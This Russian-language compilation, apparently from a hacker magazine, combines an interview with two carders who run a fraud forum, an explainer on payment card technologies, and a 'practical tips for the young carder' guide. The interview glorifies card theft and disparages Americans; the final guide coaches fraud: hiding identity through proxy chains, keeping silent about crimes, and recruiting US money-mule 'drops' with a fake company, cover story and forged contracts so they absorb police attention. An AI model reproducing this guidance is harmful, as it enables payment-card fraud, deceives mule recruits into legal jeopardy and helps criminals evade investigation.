David: Первый компьютер под странным названием "ВЕКТОР" появился приблизительно в 1990 году. Первое время, как и большинство пользователей ПК, играл в разные игрушки. Позже стал интересоваться всем остальным.

XS: А как обстоят дела с образованием? Где в данный момент грызете гранит?

David: В данный момент заканчиваю учиться в негосударственном техникуме. Специальность в чем-то связана с кардингом, хотя на момент поступления я еще не увлекался этим направлением.

Graf: Я окончил школу и колледж, сейчас учусь в университете, на полпути к диплому.

XS: Что такое кардинг? Ваше мнение?

Graf: Кардинг - это способ завладеть чужими деньгами или приобретение какого-либо товара с помощью ворованных кредитных карточек.

XS: Когда и почему стали увлекаться кардингом?

David: Стал увлекаться кардингом чуть больше года назад. Ну, в принципе, занятие кардингом меня сильно затянуло, да и неплохой денежный доход приносит.

Graf: Занимаюсь кардингом уже 2 года, так как вижу в этом реальный способ заработать хорошие деньги, плюс огромный интерес.

XS: Сколько времени вам понадобилось, чтобы, встав однажды утром, гордо сказать: "Я - кардер"?

David: Чтобы понять, что я действительно кардер, мне понадобилось около года усиленной работы в этом направлении.

Graf: Полгодика :).

XS: Как продвигались? Что читали по ночам?

David: Все началось со сбора полезной инфы из Сети и чтения подобных статей, что и помогло мне в этом разобраться.

Graf: Со мной произошла отдельная история. Я спокойно шел по улице и вдруг заметил кредитную карту с чипом. Я очень заинтересовался, есть ли там деньги, а также как их можно снять. Недолго думая, я обратился за помощью к интернету. Сначала я искал, как взломать чип, потом постепенно узнал, что такое креды. Ну, а там, естественно, как их можно обналичить. И пошло-поехало.

XS: Что сейчас происходит на сцене? Кого считаете своими кумирами в мире кардинга?

Graf: Сцена живет, кардеры - это как чума, от которой еще не придумана вакцина. Мы были, есть и будем до тех пор, пока существует Сеть. Каждый кардер по-своему уникален, так что называть отдельно никого не буду.

David: Есть для меня несколько авторитетов в мире кардинга, но я бы не хотел говорить о них "в прямом эфире".

XS: Как возникла идея создать сайт?

David: Идея создать сайт пришла Graf’у, а я взял на себя ответственность за его разработку.

Graf: Я познакомился с David'ом, мы нашли общий язык, стали часто общаться, потом у меня появилась идея создать свой проект, он поддержал меня в этом начинании, после чего и появился сам сайт. Все просто, как сама жизнь.

XS: Какую функцию выполняет форум на сайте?

Graf: Помогает нашим мемберам в той или иной сфере кардинга, на нашем форуме всегда можно дать объявление, найти что-либо необходимое для себя, проконсультироваться и почерпнуть кучу полезной информации.

David: От себя хочу также добавить, что форум помогает общаться новичкам и продвинутым кардерам, обмениваться опытом, получать ответы на различные вопросы и т.п.

XS: Какими способами лично вы достаете креды? Какой из способов считаете самым оптимальным и безопасным?

David: Как? Я лично не хакер, чтобы ломать направо и налево интернет-магазины, поэтому покупаю картон у знакомых.

Graf: Я беру кредитки у друзей. Считаю это самым безопасным способом, а так креды добываются в основном взломом различных порносайтов, онлайн-шопов и прочих организаций, принимающих к оплате кредитные карты.

XS: Как происходит торговля кредитными карточками?

David: Креды (картон) можно купить у известных людей оптом, что будет намного дешевле, чем в розницу. Картон продают в основном за WebMoney или за E-Gold. Схема такова: ты отправляешь определенную сумму на кошелек продавцу, а тебе взамен присылают по аське или по e-mail'у картон. IMHO, нет ничего проще!

XS: Какие методы используют онлайн-шопы для борьбы с "ужасными" кардерами?

Graf: Методов борьбы очень много, но нам они уже давно известны и хорошо проработаны. Сначала были простые кредитки, сейчас ввели защитный код cvv2 и cvc. Хотя найти сайты с использованием простых кред тоже еще реально. Есть случаи, когда требуется голосовое подтверждение. Часто требуется выслать сканы паспорта, прав или кредитной карты. Но мы не спим и постоянно придумываем методы противодействия различным защитам.

XS: Совесть не мучает?

David: А почему меня совесть должна мучить? Я же не своих граблю, а в основном жадных буржуев или богатых магнатов. Я же не забираю последние деньги у нищего.

Graf: Нет, не мучает. А за что? За то, что я беру немного денег у зажравшейся нации, таких, как Амеры? Страна, где 60% населения страдают ожирением, которые вечно лезут, куда их не просят, что-то диктуют, указывают, в каждой жопе затычка? Один старый кардер сказал умную фразу: "Мы сделаем Штаты немного беднее, а Россию и СНГ немного богаче".

XS: Ваша позиция ясна. А знаете такой отдел "К"?

David: Конечно. Знаем и про отдел "Р", и про отдел "К". Вот и используем любые средства, чтобы обезопасить себя от них. Практически все кардеры используют анонимные прокси, VPN и прочие фишки.

Graf: Знаю. Попасть к ним в лапы, конечно, не хотелось бы, но, как говорится, волков бояться - в лес не ходить.

XS: Какая ось установлена у вас на ПК, какую считаете самой безопасной?

David: В данный момент установлен Windows 2000 Pro. Не использую Linux, так как привык к окошкам.

Graf: До появления XP использовал 98, а теперь всерьез подсел на XP. А безопасность в микрософте - понятие относительное.

XS: У кардера какой-то особый софт на тачке или как у всех?

David: На моем писюке прижились Miranda, WinRar, FlashGet, RusmIRC, SocksCap, CuteFTP Pro, Internet Explorer, Webmoney, WinAmp и прочие софтинки. А помимо этого использую множество самописного софта, перечислять нет смысла - все noname.

Graf: Не буду оригинален: IE, OutLook, ICQ, WinAmp, OutPost...

XS: На чем программируете?

David: PHP, ASP и C++.

XS: А чем занимаетесь в свободное от кардинга время?

David: В свободное время пытаюсь находиться на расстоянии от компьютера. Отдыхаю как все обычные люди.

Graf: Учусь, тусуюсь в клубах, отдыхаю всячески и по-разному.

XS: Что кардеры слушают?

David: В основном Круг. Обожаю русский шансон, но могу на время запасть и на классные диджейские миксы.

Graf: Особых кумиров у меня нет, но люблю послушать Linda, Enigma, Prodigy, In-Grid, Глюкоза и ВИАГРА.

XS: Что читают? Любимый автор?

David: Пока не хватает времени на книги, учусь усиленно.

Graf: Сейчас ничего не читаю, только прессу. Любимый автор - Достоевский.

XS: Смотрите ТВ?

David: Естественно смотрю, в основном спорт. Иногда новости.

Graf: Конечно. Люблю хорошие фильмы и свежие новости.

XS: И напоследок пару слов нашим читателям, желающим встать на путь кардинга.

David: Прежде чем примешь решение выйти на "большую дорогу", подумай над этим 101 раз.

Пластиковые карты на все случаи жизни

Вот уже несколько десятилетий пластиковые карты широко используются в повседневной жизни. Появившись задолго до распространения персональных компьютеров и сотовых телефонов, они заменяют бумажные купюры, пропуска и удостоверения.

Но очевидные преимущества скрывают за собой менее очевидные недостатки. Если для того, чтобы лишить тебя наличности, мошеннику необходимо вытащить кошелек у тебя из сумки или кармана, то для воровства с помощью пластиковых карт он может находиться в соседней комнате, а может и на другом континенте.

Проблема identity theft (дословно - воровство идентификационных данных) стала в последнее время одной из самых обсуждаемых тем. Хотя под этим термином понимают и подделку чеков, и кражу паролей, а по мере распространения альтернативных механизмов аутентификации (в частности, биометрия) приходится учитывать все новые и новые возможности для злоупотреблений личной информацией, в центре внимания находятся именно пластиковые карты.

Они есть и у студентов, и у бизнесменов, и у домохозяек - дебетные и кредитные, для проезда на общественном транспорте, оплаты телефонных переговоров, доступа в интернет и т.п. Дошло до того, что пластиковые телефонные карты стали объектом коллекционирования - на любом онлайн-аукционе можно найти раздел, посвященный этой "филателии XXI века". Даже в поликлиниках вместо бумажного страхового полиса теперь выдают пластиковые карты!

По методу хранения информации весь этот "пластик" можно разделить на три основных категории: карты с магнитной полосой, скретч-карты и смарт-карты. В отдельную группу выделяют пластиковые визитные карточки и прочую сувенирную продукцию, виды правонарушений с их использованием якобы неизвестны. Хотя в метро я несколько раз проходил мимо свирепых старушек, показывая им пластиковый календарик, причем прошлогодний.

Карты с магнитной полосой

Первое, что приходит в голову, когда слышишь термин "пластиковая карта" - это классические карты с магнитной полосой. Появились они еще в 50-х годах прошлого века. Пионером в использовании новой технологии стала компания Diners Club, а затем к ней присоединилась и American Express. За это время карты распространились по всему миру, на них же и приходится самый большой процент противоправных действий или, попросту говоря, случаев мошенничества и воровства.

Согласно стандарту ISO-7810, пластиковая карта представляет собой прямоугольную пластину размером 85,6х54 мм и толщиной 0,76 мм. Для защиты этого миниатюрного кусочка пластмассы используются последние технологии в самых разных областях: полиграфии, химической промышленности, разработке программного обеспечения и т.п.

Обычно карта несет на себе следующую информацию:

На лицевой стороне:
  • уникальный 16-значный номер;
  • срок действия (от и до);
  • имя владельца.
На тыльной стороне:
  • магнитная полоса;
  • подпись владельца.
Кроме того, полиграфическим способом на карту может наноситься множество изображений: фотография владельца, справочная информация для клиентов банка и т.п.

Буквы и цифры на лицевой стороне могут быть выбиты специальным эмбоссером, а могут быть и просто напечатаны, к примеру, как на картах Visa Electron.

Основным хранилищем данных на карте является магнитная полоса. По своим свойствам она похожа на пленку, которая используется в аудиокассетах. Информация может записываться на три дорожки, отличающиеся форматом:
  • первая имеет плотность записи 210 бит на дюйм (BPI) и может содержать 79 7-битных (6 бит + четность) алфавитно-цифровых символов (доступны только для чтения);
  • вторая - 75 BPI, содержит 40 5-битных (4 бита + четность) цифр;
  • третья - 210 BPI, содержит 107 5-битных (4 бита + четность) цифр.
На банковских картах на дорожки записываются: номер счета, код валюты, код страны выдачи, имя владельца, срок действия (в принципе, та же информация, что напечатана на самой карте, но в цифровом виде). Кроме того, любая компания может использовать собственный формат данных. Например, для использования в качестве внутреннего пропуска там вместо номера счета может быть указан уровень полномочий владельца и т.п.

Каждый раз для проведения денежных транзакций с помощью банковских карт системой инициируется процесс аутентификации - проверяется правильность записанной на карте информации. Аутентификация бывает следующих видов:
  • голосовая авторизация - простейший случай, проводится с помощью телефона с тоновым набором;
  • электронный терминал - считывание информации с магнитной полосы, например, в банкоматах или POS-терминалах;
  • виртуальный терминал - проверка данных при оплате через интернет.
В любом случае, на одной стороне находится владелец карты, а на другой - специализированная организация (acquirer), которая устанавливает связь с банком, выдавшим карту, для проверки данных:
  • номер карты;
  • лимит (для кредитной карты);
  • срок действия карты;
  • наличие денег на счете.
Если все необходимые условия выполнены, а запрошенная сумма не превышает остаток на счете, эта же организация обеспечивает гарантии перевода денег другому участнику транзакции.

Передача данных между терминалом и проверяющей организацией происходит по телефонным сетям или по интернет-каналам. Для защиты передаваемых данных используется шифрование. К примеру, банкомат шифрует введенный PIN-код и отправляет его для сверки с тем, что хранится в базе данных банка, выдавшего карту. Для шифрования используется криптографический метод односторонних функций. Их значение легко вычислить в одном направлении с использованием банковского ключа и набранного PIN-кода, а проведение обратного преобразования (инвертирования) на практике очень неэффективно, даже если банковский ключ стал известен. Эта защита была введена, чтобы защитить держателя карты от действий нехорошего дяди, получившего доступ к банковским базам.

Кроме технических средств, большое значение имеют организационные и административные методы защиты. Они включают в себя целый комплекс мер на самых разных уровнях: от специальных замков на кабинах банкоматов и call-центров экстренной помощи, куда следует обращаться в случае утери или кражи карточки, до правительственного контроля над продажей оборудования для производства самих карт.

Казалось бы, в процессе оплаты по пластиковой карте все настолько предусмотрено, а каждая операция проходит столько различных проверок, что проще, наверное, было бы внедриться в зарубежную разведку, чем украсть деньги со счета. И хотя статистику выявления шпионов от нас скрывают, судя по доступной информации о случаях мошенничества, все оказывается далеко не так радужно, как хотелось бы. При удачных атаках добычей хакеров становится информация о миллионах банковских карт. И такие случаи происходят достаточно часто, чтобы заставить беспокоиться каждого, кто хранит свои деньги "на карточке".

Но проблемы, с которыми сталкиваются люди при использовании пластиковых карт с магнитной лентой, не ограничиваются лишь противоправными действиями. Как и любая другая технология полувековой давности, они имеют ряд недостатков. К примеру, массу неудобств приносит тот факт, что любой магнит может элементарно стереть всю хранящуюся информацию, и даже простые царапины могут повлиять на ее целостность. И это еще не самое страшное, по сравнению с другими "родовыми травмами".

Смарт-карты

Технология смарт-карт, призванная исправить эти недостатки, существует довольно давно. Впервые ими начали пользоваться французы в 1984 году. Но до сих пор они не получили повсеместного распространения. Хотя и были планы, согласно которым к 2004 году все платежные системы собирались перейти на использование смарт-карт, банки все продолжают выпускать старый добрый "пластик".

Снаружи карты обоих типов (магнитные и смарт-карты) выглядят почти одинаково, но зато внутри... Начну с того, что у обычных карт никакого "внутри" вообще нет, а у смарт-карт там под позолоченными контактами спрятан микрочип. Он может содержать до килобайта RAM, 24 Кб ROM и 16 Кб перепрограммируемого ROM. В нем есть еще и 8-битный микропроцессор, работающий на частоте около 5 МГц. И все это в упаковке тоньше миллиметра! Понятное дело, что с таким богатством магнитная полоса отпадает за ненадобностью.

Вычислительные возможности процессора позволяют перейти от обычной аутентификации к полноценному применению криптографии. И хотя для пользователя, снимающего деньги, процедура выглядит привычно (ввел PIN-код и готово), внутри системы работает сложный механизм обмена зашифрованными данными.

Для того чтобы обеспечить максимальную защиту этих алгоритмов, на каждом этапе жизненного цикла смарт-карт закладывается свой "секрет". Таким образом, даже если злоумышленники внедрятся непосредственно в технологический процесс, сами карты не будут скомпрометированы.

Процессор внутри каждой карты работает под управлением операционной системы, предоставляющей достаточно удобный интерфейс для разработчика. Именно благодаря этой системе и возможно выполнение программ, запись и чтение файлов, шифрование и проверка криптографических данных. Гибкость ее настолько велика, что корпорация Sun даже разработала платформу Java Card, позволяющую использовать для разработки специализированных приложений свою сверхпопулярную технологию Java.

Существенно увеличенная (по сравнению с магнитной картой) емкость носителя и удобный доступ к хранящимся данным позволяют использовать одну карточку для нескольких типов операций. К примеру, в качестве пропуска, для получения зарплаты и доступа в компьютерную сеть компании. Таким образом ты избавляешься от тугой стопки карт в кошельке, получая вместо них одну универсальную.

Что же мешает внедрению этой замечательной технологии на практике? Как ни банально, все опять упирается в деньги. И дело здесь не только и не столько в разнице стоимости готовых карт. Все дело, прежде всего, в огромной инфраструктуре, обширной сети банкоматов, POS-терминалов и прочей техники, охватившей всю планету. Замена и модификация оборудования, разработка и внедрение программного обеспечения, обучение персонала - трудно даже представить, во сколько все это обойдется.

Из-за этих сложностей смарт-карты пока внедряются на более узких рынках. Например, многие современные компьютеры, особенно предназначенные для корпоративных заказчиков, имеют встроенные устройства для их чтения. Так как большинство операционных систем поддерживают авторизацию пользователей с помощью аппаратных средств, это позволяет существенно повысить безопасность в компьютерной сети компании. Теперь нерадивые пользователи не будут приклеивать бумажку с паролем на монитор или класть ее под клавиатуру. Будет достаточно вставить свою персональную (без пошлостей) карту в слот и готово.

В новостях регулярно появляются сообщения о том, что правительства разных стран планируют использовать возможности смарт-карт для создания паспортов нового поколения, размещая в памяти целую картотеку данных по каждому гражданину: биометрическую информацию, медицинскую и страховую истории, ключи персональной "электронной подписи" и т.п.

Скретч-карты

Мошенничество с предоплаченными, или скретч-картами, наиболее распространено. Действительно, несерьезно было бы тратить время и деньги на разработку каких-то хитрых технологий для считывания информации под защитным слоем. К тому же прибыли здесь несравнимо меньше и ограничены. Гораздо интереснее закупить оборудование и организовать производство большой партии "двойников", максимально похожих на карты популярных платежных систем, телекоммуникационных компаний и т.п.

Из-за специфики скретч-карт, их графическому оформлению уделяется особое внимание. Обычно отличия "двойников" от оригинала проявляются именно в деталях, когда не удается повторить более сложный технологический процесс или миниатюрные элементы рисунка. Так, в известном инциденте с распространением поддельных карт "БИ+" опознать их можно было по более широким линиям штрих-кода и способу его нанесения (не над защитным слоем ламината, а под ним). Еще одним различием (более заметным) был повторяющийся серийный номер.

В простейшем случае номера генерируются случайно. Если же преступникам каким-либо образом удастся заполучить базы данных действительных номеров и PIN-кодов, а потом выбросить на рынок подобные подделки… Примерно такие кошмары снятся руководителям служб безопасности крупных интернет-провайдеров и компаний-операторов сотовой связи.

Именно поэтому многие крупные фирмы предпочитают взять выпуск "пластика" в свои руки. Для этого они закупают оборудование на сотни тысяч долларов, обучают персонал и налаживают собственное производство. Впрочем, зачастую бывает достаточно закупать готовые карты у специализированных компаний, а потом на собственных мощностях наносить на них номера и защитный слой.

Что дальше

Три описанные категории не охватывают все разнообразие карт. Для пропусков и страховых полисов, к примеру, часто используются лишь штрих-коды, а в дисконтных и клубных системах карты могут вообще не нести никакой информации, кроме уникального номера и ФИО. В большинстве случаев повысить относительно невысокий уровень защиты позволяет нанесение фотографии владельца (и на проходной, и в магазине достоверность дополнительно проверяется человеком). А защитить карту от подделки помогает сложная полиграфия, например, нанесение голографического рисунка.

В общем, технологий очень много, а завтра будет еще больше. Хорошо ли это? Да просто замечательно! Но верно сказал классик: воруют...

Номер карты

Номер карты является первичным источником информации о ней: по нему можно узнать тип карты, банк-эмитент, а также номер счета. Структура может различаться (так, существуют карты Visa с 13 и 16-значными номерами), но по первой цифре всегда можно определить, какой системе она принадлежит:
  • 3 – American Express, Diners Club и некоторые другие системы
  • 4 – Visa
  • 5 – MasterCard
  • 6 – DiscoverCard
Жизнь карты

Первый этап: производство компонентов


После сборки в чип закладывается специальный ключ (fabrication key, KF). Он не позволяет внести в него изменения до непосредственного запечатывания в пластик. KF создается с помощью специальных алгоритмов и с использованием мастер-ключа изготовителя, уникален для каждой выпускаемой карты.

Второй этап: перед персонализацией карты

Готовый чип поставляется компании, выпускающей чистые смарт-карты. На месте он устанавливается на пластиковую основу и тестируется. FK заменяется ключом персонализации (personalisation key, KP). Для дополнительной безопасности на KP устанавливается блок Vper (personalisation lock). Физический доступ к памяти полностью закрывается, а для записи и изменения информации используется только программный метод. После этого системные области, на которых содержатся заложенные ключи, недоступны для чтения и записи.

Третий этап: персонализация карты

Этот этап выполняется компанией-эмитентом (например, банком). В память записывается специальное программное обеспечение, формируются файлы данных, содержащие информацию о владельце карты, PIN-коде и т.д. В конце данные закрываются блоком Vutil (utilisation lock). После этого карта может выдаваться ее новому владельцу.

Четвертый этап: использование карты

В процессе использования активируются программы, они обращаются к логической файловой системе, запускают механизмы шифрования и т.п. Доступ к данным определяется заложенной политикой безопасности.

Пятый этап: истечение срока действия

Переход к заключительному этапу может быть инициирован двумя способами. Первый выполняется программой, которая записывает последний блок (invalidation lock) на мастер-файл. После этого любые операции записи становятся недоступны, но операции чтения могут быть проведены, например, для анализа хранящейся информации. Другой способ заключается в установке блока на PIN-код и дополнительный разблокирующий PIN-код. В этом случае становятся невозможны все операции, даже чтение.

Многие из нас могут даже не догадываться, что являются пользователями смарт-карт. К примеру, SIM-карта твоего сотового телефона являются той самой "умной картой", но без "лишнего" пластика.

Они есть и у студентов, и у бизнесменов, и у домохозяек - дебетные и кредитные, для проезда на общественном транспорте, оплаты телефонных переговоров, доступа в интернет и т.п.

Согласно стандарту ISO-7810, пластиковая карта представляет собой прямоугольную пластину размером 85,6х54 мм и толщиной 0,76 мм.

На банковских картах на дорожки записываются: номер счета, код валюты, код страны выдачи, имя владельца, срок действия (в принципе, та же информация, что напечатана на самой карте, но в цифровом виде).

Для шифрования используется криптографический метод односторонних функций. Их значение легко вычислить в одном направлении с использованием банковского ключа и набранного PIN-кода.

И хотя для пользователя, снимающего деньги, процедура выглядит привычно (ввел PIN-код и готово), внутри системы работает сложный механизм обмена зашифрованными данными.

Теперь нерадивые пользователи не будут приклеивать бумажку с паролем на монитор или класть ее под клавиатуру. Будет достаточно вставить свою персональную (без пошлостей) карту в слот и готово.

Для пропусков и страховых полисов, к примеру, часто используются лишь штрих-коды, а в дисконтных и клубных системах карты могут вообще не нести никакой информации, кроме уникального номера и ФИО.

Практические советы юному кардеру

Хорошо быть богатым. Покупать крутые тачки, водить девочек в рестораны, а на выходные мотаться куда-нибудь на Кипр. В основном поэтому люди и начинают заниматься кардингом - хочется быстрых денег, хочется на Кипр.

Но случается так, что дорога приводит не под пальмы, а прямиком в тюремный барак, где небо в клеточку, а роль девочки играешь ты сам. И виной тому не дяди в погонах, которые рано или поздно придут за тобой, а ты, так как вовремя не позаботился о своей безопасности.

Прошвырнувшись по интернету и пообщавшись с толковыми людьми, я подобрал небольшую коллекцию хинтов из серии "как обезопасить себя". Возможно, некоторые из них тебе покажутся банальными, но менее важными они от этого не становятся. Прочти и запомни. И тогда, если повезет, тебе удастся избежать свиданок с ментами.

Чтоб не остаться в дураках, читай внимательно УК

Многие ньюбисы, которые втягиваются в кардинг, настолько загораются идеей сорвать халявный куш, что забывают о правовой стороне своих дел. Ведь все эти скарженные плееры и диски, ноутбуки и нал не с луны падают. Они чьи-то, и ты их не подобрал на улице, а именно украл. А воровство уголовно наказуемо, так даже в УК написано. Этим самым УК будут руководствоваться дяди в погонах, когда придут забрать тебя от мамы с папой в тюрьму. И этот самый УК ты должен выучить как свои пять пальцев, чтобы знать, на сколько времени родители могут лишиться сына, если сынуля наломает дров.

Основные статьи, на которые ты должен обратить внимание, это 159 (мошенничество), 165 (причинение имущественного ущерба путем обмана или злоупотребления доверием), 174 (отмывание денежных средств или иного имущества, приобретенных другими лицами преступным путем), 175 (приобретение или сбыт имущества, заведомо добытого преступным путем), 186 (изготовление или сбыт поддельных денег или ценных бумаг), 187 (изготовление или сбыт поддельных кредитных, либо расчетных карт и иных платежных документов), 272 (неправомерный доступ к компьютерной информации) и 273 (создание, использование и распространение вредоносных программ для ЭВМ). Вообще, прежде чем лезть "в бой", основательно разузнай и осознай, куда именно ты лезешь. Чтобы после счастливых улыбок от успешно скарженного добра не было слез недоумения, чего это вдруг какие-то злые дяди хотят лишить тебя свободы.

Чем меньше говорить ты будешь, тем меньше вероятность, что себя погубишь

Если, несмотря на все ужасы, описанные в УК, ты все-таки решился на ответственный шаг, запомни простое, но важное правило: "Молчание - золото". Конечно, хочется похвастаться перед кентами своей элитностью и халявным добром. Рассказать Вовану, как круто ты надул узбека из Америки. Но где гарантии, что Вова не скажет Пете, а Петя из зависти - майору милиции Козлову? Не думай, что твой напарник, с которым вы проворачиваете дела уже несколько месяцев и болтаете целыми днями по аське, не заложит тебя, если его прижучат. Во время допросов и обработки ментами он будет думать не о тебе и вашей дружбе, а о своей шкуре и свободе. И даже ближайших родственников, в которых ты полностью уверен, не стоит посвящать в тонкости своей работы. Они могут случайно сболтнуть лишнего, а отсиживать придется тебе.

После вливания в кардерский бизнес твои связи должны разделиться на личные и деловые. Те, с кем ты водишь дружбу и любовь, не должны ничего знать о делах, а те, с кем ты делаешь дела и деньги (другие кардеры), пусть остаются в неведении относительно твоей реальной жизни.

И еще. Если, помимо кардинга, ты юзаешь всякие чаты и любишь покрасоваться на форумах, не сиди везде под одним ником. "Рабочий" ник не должен больше нигде светиться. Бывает, посмотришь, вроде солидный человек, гроза кред и дропов, а введешь никнейм в ya.ru, и на первой же свалившейся паге читаешь объявку пятилетней давности: "Молодой и красивый, познакомлюсь с молодой и красивой", а внизу актуальный телефон.

Прокси - лучшая защита, юзай ее, и ты - элита

Так как большинство кардерских операций сейчас осуществляется через Сеть, то пора подумать, как бы прикрыть свою задницу, блуждая по инету. В этом деле лучшим другом для кардеров являются прокси-серверы. Далеко не каждый прокси обеспечивает полную анонимность. Некоторые из них, хоть и являются посредниками между твоим компом и атакуемой жертвой, настоящего адреса не скрывают. Другие оставляют информацию об использовании прокси. А учитывая то, что не все ресурсы позволяют зайти под проксей, и не все юзвери доверяют ныкающимся за проксями парням - это не есть гуд. Посмотреть, видит ли сервак твою проксю, можно здесь - http://www.all-nettools.com/toolbox/network-tools.htm

Поэтому наш выбор - анонимные прокси. Они не оставляют никакой лишней информации и хорошо справляются со своей основной функцией - обеспечением анонимности. Большой список анонимных проксей можно найти на kiev-security.org.ua/box/a1/2.shtml, или пошарься по netspy.ukrpack.net. На кардерпланете за 60 ВМ в месяц предлагают купить доступ к сотням быстрых анонимных проксей (или к 500K за 300 зеленых). Если есть лишние деньги, советую воспользоваться этим предложением, так как приватные серваки в любом случае лучше публичных.

Если ты серьезно задумываешься о своей безопасности, нужно, чтобы у тебя под проксей бегали не только Opera (IE), но и IRC-клиент, фтп-клиент и даже аська. Для удобства работы и настройки советую скачать занятную программу Anonimity4Proxy. В ней предусмотрены настройки прокси-соединений через любые порты, возможность автозамены серваков через какое-то время, возможность отключить недоступные из браузера функции, оставляющие следы в Сети, и другие полезные фичи.

Если ты проворачиваешь простенькое дельце, к примеру, пытаешься спионерить mp3-плеер, то одного анонимного прокси будет вполне достаточно. Но если оборот твоего бизнеса составляет десятки тысяч долларов, федералы легко могут запросить информацию с прокси, под которым ты проказничал, и хозяину сервака, хочешь не хочешь, придется заглянуть в логи и отыскать твой реальный IP. Чтобы усложнить задачу людям в черном, нужно создать цепочку прокси-соединений. При этом ты сначала соединяешься с одним прокси-серваком, потом с него заходишь на второй, со второго на третий и затем, через все эти узлы, соединяешься с нужным тебе компом. Связь при этом, мягко говоря, немного ухудшается, но твоя безопасность повышается многократно. Теоретически цепочки из трех проксей достаточно, чтобы тебя не нашли, хотя гарантий никаких нет. Мало ли что ты натворишь, и насколько серьезно за тобой будут охотиться. Для удобной работы с цепочками проксей скачай программу SocksChain.

И, конечно же, не забывай про фаервол, который должен быть у тебя на посту 24 часа в сутки и закрывать как можно больше портов. Подобных программ много, я могу посоветовать установить Outpost Firewall, который уже давно отлично себя зарекомендовал.

Коллег своих не кидай, кинуть себя не позволяй

Несмотря на то, что сам кардинг подразумевает обман других людей (практически всегда буржуев), внутри кардерского сообщества люди, кидающие "своих", вызывают только презрение. Их списки ведутся в арбитраже и блек-листах на своеобразной доске позора, и называют их либо Дятлами, либо Scum of Society (отбросы общества). Тем не менее, количество их не убывает. Все время находятся особо хитрожопые индивидуумы, которые не заморачиваются принятым в среде этикетом (в сообществе кардеров есть свои правила поведения) и руководствуются только одной целью - срубить побольше бабла. Среди нескольких тысяч читателей форума встречаются десятки подобных кидал. Всех их можно поделить на три категории: новички, любители и профи.

У первых тактика проста как две копейки - они предлагают форумянам товар или сервис, который у них якобы есть, требуют предоплату, а когда получают деньги, попросту прекращают отвечать на мыло/аську. Как правило, парни из этой категории слабо разбираются в вопросах кардинга и на форуме имеют статус ньюбиса (или вообще unregistered). В разговоре отдают предпочтение обсуждению размеров и способа перевода оплаты, а не описанию предоставляемых услуг. Внимательному человеку будет нетрудно определить такого рода кидалу, предварительно пообщавшись с ним некоторое время по аське.

Представители второй категории более подкованы в кидании коллег по ремеслу. Вначале они зарекомендовывают себя на форуме, честно предоставляя клиентам товар, завоевывая доверие остальных кардеров. Но со временем, когда заказы становятся уже более серьезными, качество услуг постепенно сходит на нет. И когда народ перестает верить отмазкам, кидала сматывает удочки и просто исчезает. Правда, только для того, чтобы вскоре снова появиться, но уже под другим ником.

Профессиональные кидалы по способам заработка схожи со своими коллегами из второй категории, но имеют намного больший опыт, а развод форумян - их постоянная и часто единственная работа. Эти парни уже долгое время тусуются в кардерской среде, знают всех инсайдеров и правила, умеют найти подход к каждому, даже самому мнительному клиенту (хотя предпочтение отдают обычно ньюбисам). Из-за хорошей осведомленности профи в кардинге, а также их осторожности, определить в них кидалу нелегко.

Лучшим советом тут будет остерегаться иметь дело с малознакомыми людьми. Форумяне обычно оставляют отзывы о качестве предоставляемых услуг, и прежде чем выходить с человеком на связь, внимательно почитай, что о нем говорят другие. Хорошую защиту от кидал дает гарант-сервис, то есть третья сторона, чей авторитет не подлежит сомнению, и через которую осуществляется сделка. Если человек согласен на такой вариант, это уже о чем-то говорит. Неплохо бы обращать также внимание на статус пользователя. Хотя членство в "verified" не дает стопроцентную гарантию, процент кидал среди них ниже, чем среди каких-нибудь "newbie".

Никогда не спеши высылать деньги. Креды, приватные прокси, полезная информация - это все, конечно, хорошо, но потрудись сначала пообщаться с их продавцом. Всегда старайся договориться об оплате после получения товара или хотя бы об авансовой оплате (вперед платится небольшая часть денег, а если все пройдет нормально, остальные деньги досылаются). Ну, а если уже кинули, сообщи об этом на форуме, чтобы кидала не разбогател на еще большую сумму.

И последнее - не советую тебе самому становиться на этот путь. Гораздо большую пользу ты принесешь себе, если заработаешь уважение среди кардеров, чем если будешь размениваться на мелочевку, кидая ньюбисов. Людей, которые кидают своих, нередко ищут и довольно жестоко наказывают. Если уж хочешь кого-то кинуть, проворачивай свои делишки с буржуями. Они и побогаче, и живут намного дальше.

Ищи только хороших дропов

Как известно, в кардинге очень важную роль играют дропы - подставные лица, через которых ты обналичиваешь украденные деньги или получаешь товар, скарженный в онлайновых магазинах. За свою помощь дроп получает денежное вознаграждение, и, так как все добро сначала приходит на его домашний адрес, именно он будет отвечать перед ментами в случае чего. Хорошего дропа найти не так уж легко. В Америке (а именно там должно проживать подставное лицо) тоже немало жадных, нечестных людей. И шанс, что дроп предпочтет оставить товар себе вместо сомнительного сотрудничества, достаточно велик. Поэтому к поиску и работе с дропами нужно подходить с умом.

В принципе, практически каждый американец с низким или средним достатком является потенциальным дропом. Хороший способ найти людей - аська со своими white pag’ами или форумы, где ищут работу (их в англонете миллион). Если у тебя туго с английским, можешь поискать среди жителей США наших эмигрантов, хотя выгоднее работать именно с коренными буржуями. Навешать лапши русскому - это не то же самое, что задурить америкоса. Чтобы дроп повелся на твое предложение, нужно создать видимость того, что ты представитель солидной развивающейся фирмы, где есть свой штат сотрудников, сайт, фирменные мыльники и подобная ерунда. Стиль писем должен быть соответствующий - официально-деловой, по которому видно, как фирма ценит каждого клиента.

Когда на твое предложение откликнется народ, расскажи заготовленную заранее легенду о том, как вы уже давно и успешно сотрудничаете с западом и перепродаете тамошнюю продукцию. Что тебе нужны люди, готовые получать и пересылать товары, зарабатывая на этом деньги. Или, если тебе нужно обналичить доллары, другую легенду (придумай уж сам). Первое время работы с дропом проверяй его. Не присылай ему дорогих товаров, не проси обналичить крупную сумму. Только когда увидишь, что человек выполняет свою работу честно и без задержек, раскручивай его дальше. Постарайся выведать об этом человеке максимум информации, а также постоянно держи его на связи. Если он будет чувствовать свою востребованность и регулярно получать обещанное вознаграждение, у него и мысли не возникнет тебя кинуть. А чтобы все было вообще замечательно, потрудись соорудить контракт, проставить "фирменные" подписи и печати и выслать факсом. Это создаст иллюзию легальности дела, а когда американская ментура постучится к посреднику в дверь (а это обязательно произойдет через несколько месяцев), у того будет какое-никакое доказательство своей непричастности к инциденту.

